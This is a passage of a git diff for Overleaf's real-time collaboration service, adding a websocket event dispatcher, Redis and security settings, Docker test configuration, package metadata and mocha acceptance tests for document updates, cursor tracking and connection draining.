io.sockets.clients(room)) { 
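+          // io.sockets.clients(room) can return duplicate entries for the
+          // same socket, so de-duplicate by client.id before counting
+          // bandwidth (the same guard is applied for message delivery below)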
+ if (seen.has(client.id)) continue + seen.add(client.id) + let v = client.id === source ? ack : broadcast + if (v === 0) { + // Acknowledgements with update.dup===true will not get sent to other clients. + continue + } + v += `5:::{"name":"otUpdateApplied","args":[]}`.length + Metrics.histogram( + 'estimated-applied-ops-bandwidth', + v, + BANDWIDTH_BUCKETS, + { path } + ) + } + } + + estimateBandwidth(projectId, 'per-project') + estimateBandwidth(docId, 'per-doc') + } else if (message.room_id) { + if (message._id && Settings.checkEventOrder) { + const status = EventLogger.checkEventOrder( + 'editor-events', + message._id, + message + ) + if (status === 'duplicate') { + return // skip duplicate events + } + } + + const isRestrictedMessage = + !RESTRICTED_USER_MESSAGE_TYPE_PASS_LIST.includes(message.message) + + // send messages only to unique clients (due to duplicate entries in io.sockets.clients) + const clientList = io.sockets.clients(message.room_id) + + // avoid unnecessary work if no clients are connected + if (clientList.length === 0) { + return + } + logger.debug( + { + channel, + message: message.message, + roomId: message.room_id, + messageId: message._id, + socketIoClients: clientList.map(client => client.id), + }, + 'distributing event to clients' + ) + const seen = new Map() + for (const client of clientList) { + if (!seen.has(client.id)) { + seen.set(client.id, true) + if (WebsocketLoadBalancer.shouldDisconnectClient(client, message)) { + logger.debug( + { + message, + userId: client?.ol_context?.user_id, + projectId: client?.ol_context?.project_id, + }, + 'disconnecting client' + ) + if ( + message?.message !== 'project:collaboratorAccessLevel:changed' + ) { + client.emit('project:access:revoked') + } + client.disconnect() + } else { + if (isRestrictedMessage && client.ol_context.is_restricted_user) { + // hide restricted message + logger.debug( + { + message, + clientId: client.id, + userId: client.ol_context.user_id, + projectId: client.ol_context.project_id, + }, + 'hiding restricted message from client' + ) + } else { + client.emit(message.message, ...message.payload) + } + } + } + } + } else if (message.health_check) { + logger.debug( + { message }, + 'got health check message in editor events channel' + ) + HealthCheckManager.check(channel, message.key) + } + }) + }, +} diff --git a/services/real-time/buildscript.txt b/services/real-time/buildscript.txt new file mode 100644 index 0000000..292fde8 --- /dev/null +++ b/services/real-time/buildscript.txt @@ -0,0 +1,9 @@ +real-time +--dependencies=redis +--docker-repos=us-east1-docker.pkg.dev/overleaf-ops/ol-docker +--env-add= +--env-pass-through= +--esmock-loader=False +--node-version=20.18.2 +--public-repo=False +--script-version=4.7.0 diff --git a/services/real-time/config/settings.defaults.js b/services/real-time/config/settings.defaults.js new file mode 100644 index 0000000..57b0a50 --- /dev/null +++ b/services/real-time/config/settings.defaults.js @@ -0,0 +1,180 @@ +/* eslint-disable camelcase */ +const http = require('node:http') +const https = require('node:https') + +http.globalAgent.keepAlive = false +https.globalAgent.keepAlive = false + +const settings = { + redis: { + pubsub: { + host: + process.env.PUBSUB_REDIS_HOST || process.env.REDIS_HOST || '127.0.0.1', + port: process.env.PUBSUB_REDIS_PORT || process.env.REDIS_PORT || '6379', + password: + process.env.PUBSUB_REDIS_PASSWORD || process.env.REDIS_PASSWORD || '', + maxRetriesPerRequest: parseInt( + process.env.PUBSUB_REDIS_MAX_RETRIES_PER_REQUEST || + 
process.env.REDIS_MAX_RETRIES_PER_REQUEST ||
+          '20'
+      ),
+    },
+
+    realtime: {
+      host:
+        process.env.REAL_TIME_REDIS_HOST ||
+        process.env.REDIS_HOST ||
+        '127.0.0.1',
+      port:
+        process.env.REAL_TIME_REDIS_PORT || process.env.REDIS_PORT || '6379',
+      password:
+        process.env.REAL_TIME_REDIS_PASSWORD ||
+        process.env.REDIS_PASSWORD ||
+        '',
+      key_schema: {
+        clientsInProject({ project_id }) {
+          return `clients_in_project:{${project_id}}`
+        },
+        connectedUser({ project_id, client_id }) {
+          return `connected_user:{${project_id}}:${client_id}`
+        },
+        projectNotEmptySince({ projectId }) {
+          return `projectNotEmptySince:{${projectId}}`
+        },
+      },
+      maxRetriesPerRequest: parseInt(
+        process.env.REAL_TIME_REDIS_MAX_RETRIES_PER_REQUEST ||
+          process.env.REDIS_MAX_RETRIES_PER_REQUEST ||
+          '20'
+      ),
+    },
+
+    documentupdater: {
+      host:
+        process.env.DOC_UPDATER_REDIS_HOST ||
+        process.env.REDIS_HOST ||
+        '127.0.0.1',
+      port:
+        process.env.DOC_UPDATER_REDIS_PORT || process.env.REDIS_PORT || '6379',
+      password:
+        process.env.DOC_UPDATER_REDIS_PASSWORD ||
+        process.env.REDIS_PASSWORD ||
+        '',
+      key_schema: {
+        pendingUpdates({ doc_id }) {
+          return `PendingUpdates:{${doc_id}}`
+        },
+      },
+      maxRetriesPerRequest: parseInt(
+        process.env.DOC_UPDATER_REDIS_MAX_RETRIES_PER_REQUEST ||
+          process.env.REDIS_MAX_RETRIES_PER_REQUEST ||
+          '20'
+      ),
+    },
+
+    websessions: {
+      host:
+        process.env.SESSIONS_REDIS_HOST ||
+        process.env.REDIS_HOST ||
+        '127.0.0.1',
+      port: process.env.SESSIONS_REDIS_PORT || process.env.REDIS_PORT || '6379',
+      password:
+        process.env.SESSIONS_REDIS_PASSWORD || process.env.REDIS_PASSWORD || '',
+      maxRetriesPerRequest: parseInt(
+        process.env.SESSIONS_REDIS_MAX_RETRIES_PER_REQUEST ||
+          process.env.REDIS_MAX_RETRIES_PER_REQUEST ||
+          '20'
+      ),
+    },
+  },
+
+  internal: {
+    realTime: {
+      port: 3026,
+      host: process.env.LISTEN_ADDRESS || '127.0.0.1',
+    },
+  },
+
+  apis: {
+    web: {
+      url: `http://${
+        process.env.WEB_API_HOST || process.env.WEB_HOST || '127.0.0.1'
+      }:${process.env.WEB_API_PORT || process.env.WEB_PORT || 3000}`,
+      user: process.env.WEB_API_USER || 'overleaf',
+      pass: process.env.WEB_API_PASSWORD || 'password',
+    },
+    documentupdater: {
+      url: `http://${
+        process.env.DOCUMENT_UPDATER_HOST ||
+        process.env.DOCUPDATER_HOST ||
+        '127.0.0.1'
+      }:3003`,
+    },
+  },
+
+  security: {
+    sessionSecret: process.env.SESSION_SECRET,
+    sessionSecretUpcoming: process.env.SESSION_SECRET_UPCOMING,
+    sessionSecretFallback: process.env.SESSION_SECRET_FALLBACK,
+  },
+
+  cookieName: process.env.COOKIE_NAME || 'overleaf.sid',
+
+  // Expose the hostname in the `debug.getHostname` rpc
+  exposeHostname: process.env.EXPOSE_HOSTNAME === 'true',
+
+  max_doc_length: 2 * 1024 * 1024, // 2mb
+
+  // should be set to the same value as dispatcherCount in document-updater
+  pendingUpdateListShardCount: parseInt(
+    process.env.PENDING_UPDATE_LIST_SHARD_COUNT || 10,
+    10
+  ),
+
+  // combine
+  // max_doc_length (2mb see above) * 2 (delete + insert)
+  // max_ranges_size (3mb see MAX_RANGES_SIZE in document-updater)
+  // overhead for JSON serialization
+  maxUpdateSize:
+    parseInt(process.env.MAX_UPDATE_SIZE) || 7 * 1024 * 1024 + 64 * 1024,
+
+  shutdownDrainTimeWindow: process.env.SHUTDOWN_DRAIN_TIME_WINDOW || 9,
+
+  // The shutdown procedure asks clients to reconnect gracefully.
+  // 3rd-party/buggy clients may not act upon receiving the message and keep
+  // stale connections alive. We forcefully disconnect them after X ms:
+  gracefulReconnectTimeoutMs:
+    parseInt(process.env.GRACEFUL_RECONNECT_TIMEOUT_MS, 10) ||
+    // The frontend allows actively editing users to keep the connection open
+    // for up to ConnectionManager.MAX_RECONNECT_GRACEFULLY_INTERVAL=45s.
+    // Permit an extra delay to account for slow/flaky connections.
+    (45 + 30) * 1000,
+
+  continualPubsubTraffic: process.env.CONTINUAL_PUBSUB_TRAFFIC || false,
+
+  checkEventOrder: process.env.CHECK_EVENT_ORDER || false,
+
+  publishOnIndividualChannels:
+    process.env.PUBLISH_ON_INDIVIDUAL_CHANNELS || false,
+
+  statusCheckInterval: parseInt(process.env.STATUS_CHECK_INTERVAL || '0'),
+
+  // The deployment colour for this app (if any). Used for blue/green deploys.
+  deploymentColour: process.env.DEPLOYMENT_COLOUR,
+  // Load balancer health checks will return 200 only when this file contains
+  // the deployment colour for this app.
+  deploymentFile: process.env.DEPLOYMENT_FILE,
+
+  errors: {
+    catchUncaughtErrors: true,
+    shutdownOnUncaughtError: true,
+  },
+
+  behindProxy: process.env.BEHIND_PROXY === 'true',
+  trustedProxyIps: process.env.TRUSTED_PROXY_IPS,
+  keepAliveTimeoutMs: parseInt(process.env.KEEPALIVE_TIMEOUT_MS ?? '5000', 10),
+  allowedCorsOrigins: process.env.REAL_TIME_ALLOWED_CORS_ORIGINS,
+}
+
+// console.log settings.redis
+module.exports = settings
diff --git a/services/real-time/config/settings.test.js b/services/real-time/config/settings.test.js
new file mode 100644
index 0000000..e74a6fb
--- /dev/null
+++ b/services/real-time/config/settings.test.js
@@ -0,0 +1,11 @@
+module.exports = {
+  errors: {
+    catchUncaughtErrors: false,
+  },
+
+  security: {
+    sessionSecret: 'static-secret-for-tests',
+    sessionSecretFallback: 'static-secret-fallback-for-tests',
+    sessionSecretUpcoming: 'static-secret-upcoming-for-tests',
+  },
+}
diff --git a/services/real-time/docker-compose.ci.yml b/services/real-time/docker-compose.ci.yml
new file mode 100644
index 0000000..9011627
--- /dev/null
+++ b/services/real-time/docker-compose.ci.yml
@@ -0,0 +1,51 @@
+# This file was auto-generated, do not edit it directly.
+# Instead run bin/update_build_scripts from
+# https://github.com/overleaf/internal/
+
+version: "2.3"
+
+services:
+  test_unit:
+    image: ci/$PROJECT_NAME:$BRANCH_NAME-$BUILD_NUMBER
+    user: node
+    command: npm run test:unit:_run
+    environment:
+      NODE_ENV: test
+      NODE_OPTIONS: "--unhandled-rejections=strict"
+
+
+  test_acceptance:
+    build: .
+    image: ci/$PROJECT_NAME:$BRANCH_NAME-$BUILD_NUMBER
+    environment:
+      ELASTIC_SEARCH_DSN: es:9200
+      REDIS_HOST: redis
+      QUEUES_REDIS_HOST: redis
+      HISTORY_REDIS_HOST: redis
+      ANALYTICS_QUEUES_REDIS_HOST: redis
+      MONGO_HOST: mongo
+      POSTGRES_HOST: postgres
+      MOCHA_GREP: ${MOCHA_GREP}
+      NODE_ENV: test
+      NODE_OPTIONS: "--unhandled-rejections=strict"
+    depends_on:
+      redis:
+        condition: service_healthy
+    user: node
+    command: npm run test:acceptance
+
+
+  tar:
+    build: .
+    image: ci/$PROJECT_NAME:$BRANCH_NAME-$BUILD_NUMBER
+    volumes:
+      - ./:/tmp/build/
+    command: tar -czf /tmp/build/build.tar.gz --exclude=build.tar.gz --exclude-vcs .
+    user: root
+  redis:
+    image: redis
+    healthcheck:
+      test: ping="$$(redis-cli ping)" && [ "$$ping" = 'PONG' ]
+      interval: 1s
+      retries: 20
+
diff --git a/services/real-time/docker-compose.yml b/services/real-time/docker-compose.yml
new file mode 100644
index 0000000..d40fada
--- /dev/null
+++ b/services/real-time/docker-compose.yml
@@ -0,0 +1,54 @@
+# This file was auto-generated, do not edit it directly.
+# Instead run bin/update_build_scripts from +# https://github.com/overleaf/internal/ + +version: "2.3" + +services: + test_unit: + image: node:20.18.2 + volumes: + - .:/overleaf/services/real-time + - ../../node_modules:/overleaf/node_modules + - ../../libraries:/overleaf/libraries + working_dir: /overleaf/services/real-time + environment: + MOCHA_GREP: ${MOCHA_GREP} + LOG_LEVEL: ${LOG_LEVEL:-} + NODE_ENV: test + NODE_OPTIONS: "--unhandled-rejections=strict" + command: npm run --silent test:unit + user: node + + test_acceptance: + image: node:20.18.2 + volumes: + - .:/overleaf/services/real-time + - ../../node_modules:/overleaf/node_modules + - ../../libraries:/overleaf/libraries + working_dir: /overleaf/services/real-time + environment: + ELASTIC_SEARCH_DSN: es:9200 + REDIS_HOST: redis + HISTORY_REDIS_HOST: redis + QUEUES_REDIS_HOST: redis + ANALYTICS_QUEUES_REDIS_HOST: redis + MONGO_HOST: mongo + POSTGRES_HOST: postgres + MOCHA_GREP: ${MOCHA_GREP} + LOG_LEVEL: ${LOG_LEVEL:-} + NODE_ENV: test + NODE_OPTIONS: "--unhandled-rejections=strict" + user: node + depends_on: + redis: + condition: service_healthy + command: npm run --silent test:acceptance + + redis: + image: redis + healthcheck: + test: ping=$$(redis-cli ping) && [ "$$ping" = 'PONG' ] + interval: 1s + retries: 20 + diff --git a/services/real-time/package.json b/services/real-time/package.json new file mode 100644 index 0000000..2d5f87a --- /dev/null +++ b/services/real-time/package.json @@ -0,0 +1,52 @@ +{ + "name": "@overleaf/real-time", + "description": "The socket.io layer of Overleaf for real-time editor interactions", + "private": true, + "main": "app.js", + "scripts": { + "start": "node app.js", + "test:acceptance:_run": "mocha --recursive --reporter spec --timeout 15000 --exit $@ test/acceptance/js", + "test:acceptance": "npm run test:acceptance:_run -- --grep=$MOCHA_GREP", + "test:unit:_run": "mocha --recursive --reporter spec $@ test/unit/js", + "test:unit": "npm run test:unit:_run -- --grep=$MOCHA_GREP", + "nodemon": "node --watch app.js", + "lint": "eslint --max-warnings 0 --format unix .", + "format": "prettier --list-different $PWD/'**/*.*js'", + "format:fix": "prettier --write $PWD/'**/*.*js'", + "lint:fix": "eslint --fix .", + "types:check": "tsc --noEmit" + }, + "dependencies": { + "@overleaf/logger": "*", + "@overleaf/metrics": "*", + "@overleaf/o-error": "*", + "@overleaf/redis-wrapper": "*", + "@overleaf/settings": "*", + "async": "^3.2.5", + "base64id": "0.1.0", + "body-parser": "^1.20.3", + "bunyan": "^1.8.15", + "connect-redis": "^6.1.3", + "cookie-parser": "^1.4.6", + "express": "^4.21.2", + "express-session": "^1.17.1", + "joi": "^17.12.0", + "lodash": "^4.17.21", + "proxy-addr": "^2.0.7", + "request": "^2.88.2", + "socket.io": "github:overleaf/socket.io#0.9.19-overleaf-11", + "socket.io-client": "github:overleaf/socket.io-client#0.9.17-overleaf-5" + }, + "devDependencies": { + "chai": "^4.3.6", + "chai-as-promised": "^7.1.1", + "cookie-signature": "^1.1.0", + "mocha": "^11.1.0", + "sandboxed-module": "~0.3.0", + "sinon": "^9.2.4", + "sinon-chai": "^3.7.0", + "timekeeper": "0.0.4", + "typescript": "^5.0.4", + "uid-safe": "^2.1.5" + } +} diff --git a/services/real-time/test/acceptance/js/ApplyUpdateTests.js b/services/real-time/test/acceptance/js/ApplyUpdateTests.js new file mode 100644 index 0000000..c3e47ed --- /dev/null +++ b/services/real-time/test/acceptance/js/ApplyUpdateTests.js @@ -0,0 +1,599 @@ +/* eslint-disable + no-return-assign, +*/ +// TODO: This file was created by bulk-decaffeinate. 
+// Fix any style issues and re-enable lint. +/* + * decaffeinate suggestions: + * DS101: Remove unnecessary use of Array.from + * DS102: Remove unnecessary code created because of implicit returns + * DS201: Simplify complex destructure assignments + * Full docs: https://github.com/decaffeinate/decaffeinate/blob/master/docs/suggestions.md + */ +const async = require('async') +const { expect } = require('chai') + +const RealTimeClient = require('./helpers/RealTimeClient') +const FixturesManager = require('./helpers/FixturesManager') + +const settings = require('@overleaf/settings') +const redis = require('@overleaf/redis-wrapper') +const rclient = redis.createClient(settings.redis.documentupdater) + +const redisSettings = settings.redis + +const PENDING_UPDATES_LIST_KEYS = [0, 1, 2, 3, 4, 5, 6, 7, 8, 9].map(n => { + let key = 'pending-updates-list' + if (n !== 0) { + key += `-${n}` + } + return key +}) + +function getPendingUpdatesList(cb) { + Promise.all(PENDING_UPDATES_LIST_KEYS.map(key => rclient.lrange(key, 0, -1))) + .then(results => { + cb( + null, + results.reduce((acc, more) => { + if (more.length) { + acc.push(...more) + } + return acc + }, []) + ) + }) + .catch(cb) +} + +function clearPendingUpdatesList(cb) { + Promise.all(PENDING_UPDATES_LIST_KEYS.map(key => rclient.del(key))) + .then(() => cb(null)) + .catch(cb) +} + +describe('applyOtUpdate', function () { + before(function () { + return (this.update = { + op: [{ i: 'foo', p: 42 }], + }) + }) + describe('when authorized', function () { + before(function (done) { + return async.series( + [ + cb => { + return FixturesManager.setUpProject( + { + privilegeLevel: 'readAndWrite', + }, + (e, { project_id: projectId, user_id: userId }) => { + this.project_id = projectId + this.user_id = userId + return cb(e) + } + ) + }, + + cb => { + return FixturesManager.setUpDoc( + this.project_id, + { lines: this.lines, version: this.version, ops: this.ops }, + (e, { doc_id: docId }) => { + this.doc_id = docId + return cb(e) + } + ) + }, + + cb => { + this.client = RealTimeClient.connect(this.project_id, cb) + }, + + cb => { + return this.client.emit('joinDoc', this.doc_id, cb) + }, + + cb => { + return this.client.emit( + 'applyOtUpdate', + this.doc_id, + this.update, + cb + ) + }, + ], + done + ) + }) + + it('should push the doc into the pending updates list', function (done) { + getPendingUpdatesList((error, ...rest) => { + if (error) return done(error) + const [docId] = Array.from(rest[0]) + docId.should.equal(`${this.project_id}:${this.doc_id}`) + return done() + }) + return null + }) + + it('should push the update into redis', function (done) { + rclient.lrange( + redisSettings.documentupdater.key_schema.pendingUpdates({ + doc_id: this.doc_id, + }), + 0, + -1, + (error, ...rest) => { + if (error) return done(error) + let [update] = Array.from(rest[0]) + update = JSON.parse(update) + update.op.should.deep.equal(this.update.op) + update.meta.should.include({ + source: this.client.publicId, + user_id: this.user_id, + }) + return done() + } + ) + return null + }) + + return after(function (done) { + return async.series( + [ + cb => clearPendingUpdatesList(cb), + cb => + rclient.del( + 'DocsWithPendingUpdates', + `${this.project_id}:${this.doc_id}`, + cb + ), + cb => + rclient.del( + redisSettings.documentupdater.key_schema.pendingUpdates( + this.doc_id + ), + cb + ), + ], + done + ) + }) + }) + + describe('when authorized with a huge edit update', function () { + before(function (done) { + this.update = { + op: { + p: 12, + t: 'update is too 
large'.repeat(1024 * 400), // >7MB + }, + } + return async.series( + [ + cb => { + return FixturesManager.setUpProject( + { + privilegeLevel: 'readAndWrite', + }, + (e, { project_id: projectId, user_id: userId }) => { + this.project_id = projectId + this.user_id = userId + return cb(e) + } + ) + }, + + cb => { + return FixturesManager.setUpDoc( + this.project_id, + { lines: this.lines, version: this.version, ops: this.ops }, + (e, { doc_id: docId }) => { + this.doc_id = docId + return cb(e) + } + ) + }, + + cb => { + this.client = RealTimeClient.connect(this.project_id, cb) + return this.client.on('otUpdateError', otUpdateError => { + this.otUpdateError = otUpdateError + }) + }, + + cb => { + return this.client.emit('joinDoc', this.doc_id, cb) + }, + + cb => { + return this.client.emit( + 'applyOtUpdate', + this.doc_id, + this.update, + error => { + this.error = error + return cb() + } + ) + }, + ], + done + ) + }) + + it('should not return an error', function () { + return expect(this.error).to.not.exist + }) + + it('should send an otUpdateError to the client', function (done) { + return setTimeout(() => { + expect(this.otUpdateError).to.exist + return done() + }, 300) + }) + + it('should disconnect the client', function (done) { + return setTimeout(() => { + this.client.socket.connected.should.equal(false) + return done() + }, 300) + }) + + return it('should not put the update in redis', function (done) { + rclient.llen( + redisSettings.documentupdater.key_schema.pendingUpdates({ + doc_id: this.doc_id, + }), + (error, len) => { + if (error) return done(error) + len.should.equal(0) + return done() + } + ) + return null + }) + }) + + describe('when authorized to read-only with an edit update', function () { + before(function (done) { + return async.series( + [ + cb => { + return FixturesManager.setUpProject( + { + privilegeLevel: 'readOnly', + }, + (e, { project_id: projectId, user_id: userId }) => { + this.project_id = projectId + this.user_id = userId + return cb(e) + } + ) + }, + + cb => { + return FixturesManager.setUpDoc( + this.project_id, + { lines: this.lines, version: this.version, ops: this.ops }, + (e, { doc_id: docId }) => { + this.doc_id = docId + return cb(e) + } + ) + }, + + cb => { + this.client = RealTimeClient.connect(this.project_id, cb) + }, + + cb => { + return this.client.emit('joinDoc', this.doc_id, cb) + }, + + cb => { + return this.client.emit( + 'applyOtUpdate', + this.doc_id, + this.update, + error => { + this.error = error + return cb() + } + ) + }, + ], + done + ) + }) + + it('should return an error', function () { + return expect(this.error).to.exist + }) + + it('should disconnect the client', function (done) { + return setTimeout(() => { + this.client.socket.connected.should.equal(false) + return done() + }, 300) + }) + + return it('should not put the update in redis', function (done) { + rclient.llen( + redisSettings.documentupdater.key_schema.pendingUpdates({ + doc_id: this.doc_id, + }), + (error, len) => { + if (error) return done(error) + len.should.equal(0) + return done() + } + ) + return null + }) + }) + + describe('when authorized to read-only with a comment update', function () { + before(function (done) { + this.comment_update = { + op: [{ c: 'foo', p: 42 }], + } + return async.series( + [ + cb => { + return FixturesManager.setUpProject( + { + privilegeLevel: 'readOnly', + }, + (e, { project_id: projectId, user_id: userId }) => { + this.project_id = projectId + this.user_id = userId + return cb(e) + } + ) + }, + + cb => { + return 
FixturesManager.setUpDoc( + this.project_id, + { lines: this.lines, version: this.version, ops: this.ops }, + (e, { doc_id: docId }) => { + this.doc_id = docId + return cb(e) + } + ) + }, + + cb => { + this.client = RealTimeClient.connect(this.project_id, cb) + }, + + cb => { + return this.client.emit('joinDoc', this.doc_id, cb) + }, + + cb => { + return this.client.emit( + 'applyOtUpdate', + this.doc_id, + this.comment_update, + cb + ) + }, + ], + done + ) + }) + + it('should push the doc into the pending updates list', function (done) { + getPendingUpdatesList((error, ...rest) => { + if (error) return done(error) + const [docId] = Array.from(rest[0]) + docId.should.equal(`${this.project_id}:${this.doc_id}`) + return done() + }) + return null + }) + + it('should push the update into redis', function (done) { + rclient.lrange( + redisSettings.documentupdater.key_schema.pendingUpdates({ + doc_id: this.doc_id, + }), + 0, + -1, + (error, ...rest) => { + if (error) return done(error) + let [update] = Array.from(rest[0]) + update = JSON.parse(update) + update.op.should.deep.equal(this.comment_update.op) + update.meta.should.include({ + source: this.client.publicId, + user_id: this.user_id, + }) + return done() + } + ) + return null + }) + + return after(function (done) { + return async.series( + [ + cb => clearPendingUpdatesList(cb), + cb => + rclient.del( + 'DocsWithPendingUpdates', + `${this.project_id}:${this.doc_id}`, + cb + ), + cb => + rclient.del( + redisSettings.documentupdater.key_schema.pendingUpdates({ + doc_id: this.doc_id, + }), + cb + ), + ], + done + ) + }) + }) + + describe('when authorized with an edit update to an invalid doc', function () { + before(function (done) { + return async.series( + [ + cb => { + return FixturesManager.setUpProject( + { + privilegeLevel: 'readOnly', + }, + (e, { project_id: projectId, user_id: userId }) => { + this.project_id = projectId + this.user_id = userId + return cb(e) + } + ) + }, + + cb => { + return FixturesManager.setUpDoc( + this.project_id, + { lines: this.lines, version: this.version, ops: this.ops }, + (e, { doc_id: docId }) => { + this.doc_id = docId + return cb(e) + } + ) + }, + + cb => { + this.client = RealTimeClient.connect(this.project_id, cb) + }, + + cb => { + return this.client.emit('joinDoc', this.doc_id, cb) + }, + + cb => { + return this.client.emit( + 'applyOtUpdate', + 'invalid-doc-id', + this.update, + error => { + this.error = error + return cb() + } + ) + }, + ], + done + ) + }) + + it('should return an error', function () { + return expect(this.error).to.exist + }) + + it('should disconnect the client', function (done) { + return setTimeout(() => { + this.client.socket.connected.should.equal(false) + return done() + }, 300) + }) + + return it('should not put the update in redis', function (done) { + rclient.llen( + redisSettings.documentupdater.key_schema.pendingUpdates({ + doc_id: this.doc_id, + }), + (error, len) => { + if (error) return done(error) + len.should.equal(0) + return done() + } + ) + return null + }) + }) + + describe('when authorized with an invalid edit update', function () { + before(function (done) { + return async.series( + [ + cb => { + return FixturesManager.setUpProject( + { + privilegeLevel: 'readAndWrite', + }, + (e, { project_id: projectId, user_id: userId }) => { + this.project_id = projectId + this.user_id = userId + return cb(e) + } + ) + }, + + cb => { + return FixturesManager.setUpDoc( + this.project_id, + { lines: this.lines, version: this.version, ops: this.ops }, + (e, { doc_id: docId 
}) => { + this.doc_id = docId + return cb(e) + } + ) + }, + + cb => { + this.client = RealTimeClient.connect(this.project_id, cb) + }, + + cb => { + return this.client.emit('joinDoc', this.doc_id, cb) + }, + + cb => { + return this.client.emit( + 'applyOtUpdate', + this.doc_id, + 'invalid-update', + error => { + this.error = error + return cb() + } + ) + }, + ], + done + ) + }) + + it('should return an error', function () { + return expect(this.error).to.exist + }) + + it('should disconnect the client', function (done) { + return setTimeout(() => { + this.client.socket.connected.should.equal(false) + return done() + }, 300) + }) + + return it('should not put the update in redis', function (done) { + rclient.llen( + redisSettings.documentupdater.key_schema.pendingUpdates({ + doc_id: this.doc_id, + }), + (error, len) => { + if (error) return done(error) + len.should.equal(0) + return done() + } + ) + return null + }) + }) +}) diff --git a/services/real-time/test/acceptance/js/ClientTrackingTests.js b/services/real-time/test/acceptance/js/ClientTrackingTests.js new file mode 100644 index 0000000..415e9ad --- /dev/null +++ b/services/real-time/test/acceptance/js/ClientTrackingTests.js @@ -0,0 +1,218 @@ +/* eslint-disable + no-unused-vars, +*/ +// TODO: This file was created by bulk-decaffeinate. +// Fix any style issues and re-enable lint. +/* + * decaffeinate suggestions: + * DS101: Remove unnecessary use of Array.from + * DS102: Remove unnecessary code created because of implicit returns + * DS207: Consider shorter variations of null checks + * Full docs: https://github.com/decaffeinate/decaffeinate/blob/master/docs/suggestions.md + */ +const { expect } = require('chai') + +const RealTimeClient = require('./helpers/RealTimeClient') +const MockWebServer = require('./helpers/MockWebServer') +const FixturesManager = require('./helpers/FixturesManager') + +const async = require('async') + +describe('clientTracking', function () { + describe('when a client updates its cursor location', function () { + before(function (done) { + return async.series( + [ + cb => { + return FixturesManager.setUpProject( + { + privilegeLevel: 'owner', + project: { name: 'Test Project' }, + }, + (error, { user_id: userId, project_id: projectId }) => { + if (error) return done(error) + this.user_id = userId + this.project_id = projectId + return cb() + } + ) + }, + + cb => { + return FixturesManager.setUpDoc( + this.project_id, + { lines: this.lines, version: this.version, ops: this.ops }, + (e, { doc_id: docId }) => { + this.doc_id = docId + return cb(e) + } + ) + }, + + cb => { + this.clientA = RealTimeClient.connect(this.project_id, cb) + }, + + cb => { + this.clientB = RealTimeClient.connect(this.project_id, cb) + }, + + cb => { + return this.clientA.emit('joinDoc', this.doc_id, cb) + }, + + cb => { + this.updates = [] + this.clientB.on('clientTracking.clientUpdated', data => { + return this.updates.push(data) + }) + + return this.clientA.emit( + 'clientTracking.updatePosition', + { + row: (this.row = 42), + column: (this.column = 36), + doc_id: this.doc_id, + }, + error => { + if (error != null) { + throw error + } + return setTimeout(cb, 300) + } + ) + }, // Give the message a chance to reach client B. 
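+//
+// These tests drive the clientTracking.updatePosition round trip: cursor
+// updates are broadcast to the other clients in the project room as
+// 'clientTracking.clientUpdated' events and recorded for
+// 'clientTracking.getConnectedUsers'. Anonymous users are broadcast with an
+// empty name and are not persisted in redis (see updateClientPosition in
+// WebsocketController).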
+ ], + done + ) + }) + + it('should tell other clients about the update', function () { + return this.updates.should.deep.equal([ + { + row: this.row, + column: this.column, + doc_id: this.doc_id, + id: this.clientA.publicId, + user_id: this.user_id, + name: 'Joe Bloggs', + }, + ]) + }) + + return it('should record the update in getConnectedUsers', function (done) { + return this.clientB.emit( + 'clientTracking.getConnectedUsers', + (error, users) => { + if (error) return done(error) + for (const user of Array.from(users)) { + if (user.client_id === this.clientA.publicId) { + expect(user.cursorData).to.deep.equal({ + row: this.row, + column: this.column, + doc_id: this.doc_id, + }) + return done() + } + } + throw new Error('user was never found') + } + ) + }) + }) + + return describe('when an anonymous client updates its cursor location', function () { + before(function (done) { + return async.series( + [ + cb => { + return FixturesManager.setUpProject( + { + privilegeLevel: 'owner', + project: { name: 'Test Project' }, + publicAccess: 'readAndWrite', + }, + ( + error, + { user_id: userId, project_id: projectId, anonymousAccessToken } + ) => { + if (error) return done(error) + this.user_id = userId + this.project_id = projectId + this.anonymousAccessToken = anonymousAccessToken + return cb() + } + ) + }, + + cb => { + return FixturesManager.setUpDoc( + this.project_id, + { lines: this.lines, version: this.version, ops: this.ops }, + (e, { doc_id: docId }) => { + this.doc_id = docId + return cb(e) + } + ) + }, + + cb => { + this.clientA = RealTimeClient.connect(this.project_id, cb) + }, + + cb => { + RealTimeClient.setAnonSession( + this.project_id, + this.anonymousAccessToken, + cb + ) + }, + + cb => { + this.anonymous = RealTimeClient.connect(this.project_id, cb) + }, + + cb => { + return this.anonymous.emit('joinDoc', this.doc_id, cb) + }, + + cb => { + this.updates = [] + this.clientA.on('clientTracking.clientUpdated', data => { + return this.updates.push(data) + }) + + return this.anonymous.emit( + 'clientTracking.updatePosition', + { + row: (this.row = 42), + column: (this.column = 36), + doc_id: this.doc_id, + }, + error => { + if (error != null) { + throw error + } + return setTimeout(cb, 300) + } + ) + }, // Give the message a chance to reach client B. + ], + done + ) + }) + + return it('should tell other clients about the update', function () { + return this.updates.should.deep.equal([ + { + row: this.row, + column: this.column, + doc_id: this.doc_id, + id: this.anonymous.publicId, + user_id: 'anonymous-user', + name: '', + }, + ]) + }) + }) +}) diff --git a/services/real-time/test/acceptance/js/DrainManagerTests.js b/services/real-time/test/acceptance/js/DrainManagerTests.js new file mode 100644 index 0000000..99502e2 --- /dev/null +++ b/services/real-time/test/acceptance/js/DrainManagerTests.js @@ -0,0 +1,108 @@ +// TODO: This file was created by bulk-decaffeinate. +// Fix any style issues and re-enable lint. 
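+//
+// POST /drain?rate=N asks the service to tell connected clients to
+// 'reconnectGracefully' so they migrate away before a shutdown; rate=0 turns
+// draining off again. These tests assert that draining clients receive the
+// event without being forcibly disconnected. The exact rate semantics live in
+// DrainManager, which is not shown in this file.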
+/* + * decaffeinate suggestions: + * DS102: Remove unnecessary code created because of implicit returns + * Full docs: https://github.com/decaffeinate/decaffeinate/blob/master/docs/suggestions.md + */ +const RealTimeClient = require('./helpers/RealTimeClient') +const FixturesManager = require('./helpers/FixturesManager') + +const { expect } = require('chai') + +const async = require('async') +const request = require('request') + +const drain = function (rate, callback) { + request.post( + { + url: `http://127.0.0.1:3026/drain?rate=${rate}`, + }, + (error, response, data) => callback(error, data) + ) + return null +} + +describe('DrainManagerTests', function () { + before(function (done) { + FixturesManager.setUpProject( + { + privilegeLevel: 'owner', + project: { + name: 'Test Project', + }, + }, + (e, { project_id: projectId, user_id: userId }) => { + this.project_id = projectId + this.user_id = userId + return done() + } + ) + return null + }) + + before(function (done) { + // cleanup to speedup reconnecting + this.timeout(10000) + return 